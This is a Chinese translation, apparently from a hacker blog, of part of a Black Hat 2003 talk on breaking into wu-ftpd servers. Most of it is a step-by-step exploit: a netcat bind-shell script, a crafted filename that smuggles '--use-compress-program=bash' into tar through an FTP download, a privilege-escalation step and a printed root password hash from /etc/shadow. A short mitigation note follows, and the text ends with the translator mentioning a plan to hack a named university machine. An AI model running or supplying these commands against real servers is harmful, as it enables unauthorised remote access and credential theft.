blackhat 2003 黑客大会的另外一篇关于UNIX ftp入侵
|
翻译:cnbird 来自:http://cnbird.99blog.com/ QQ:550669 题目:blackhat 2003 黑客大会的另外一篇关于UNIX ftp入侵(第一部分)的步骤与防御方法 1.描述. ①对wu-ftpd工作的代码 ②对wu-ftpd配置的攻击 ③对wu-ftpd发出挑战 2.FTP漏洞变换 注:不是一个缓冲区溢出 在 特色的wu-ftpd用这个"为我上传的tar文件". 目标:WU-FTPD2.4.X-2.6.0(RH<=6.2 SUSE<=7.3,IMMunix<=6.2) 3.开始准备 $cat > script #!/bin/bash; nc -l -p 6666 -e /bin/bash; <CTRL-D> $tar -cf b.tar nc script $cat >blah # tar -xf b.tar ./script <CTRL-D> 4.利用 $csh $echo > "--use-compreee-program=bash blah" $ftp target (用用户登陆) ftp>put b.tar ftp>put blah ftp>put "--use-compress-program=bash blah" ftp>get "use-compress-program=bash blah".tar 5:远程shell $ nc target 6666 我们已经得到了一个远程shell当我们登陆作为的用户的特权 如果我们想得到rootshell,我们需要为我们的特权铺路. 6.rootshell?????? $tar -cf b.tar nc script userrooter.sh $ ftp target ftp> put b.tar ftp> get "--use-compress-program=bash blah".tar $nc target 6666 ./userrooter.sh userrooter by S gerp root /etc/shadow root:$1$MU.tGav3$X8WISNGV92c.Oxfe0pvqb1:11870:0:9999:7:-1:-1:134538460 7.joy. 这个代码难在实现匿名登陆上,但是这不成问题 入侵很难,主要是因为我们的chrooted没有远去. (注:chroot能保护正常的用户进入) 8:避免 我们可以通过配置ftpd守护进程的方法来关闭tar和compression(都是UNIX下的压缩命令)以达到防御这个漏洞的目的. 我们也可以确信这个登陆到服务器的anonymous匿名用户不能上传这些文件. 下面详细介绍这个内容. 9.一个/etc/ftpaccess文件 class real,guest,anonymous * email root@localhost message /welcom.msg login message ./message cwd=* compress yes all tar yes all chmod no guest,anonymoius delete no guest,anonmyous overwrite no guest,anonymous rename no guest,anonymous log transfers vanonymous.real inbound,outbound passwd-check rfc822 warn 暂时翻译到这里吧...spirit让我去入侵一台edu的机器..www.uiowa.edu是 源代码网整理以下 |
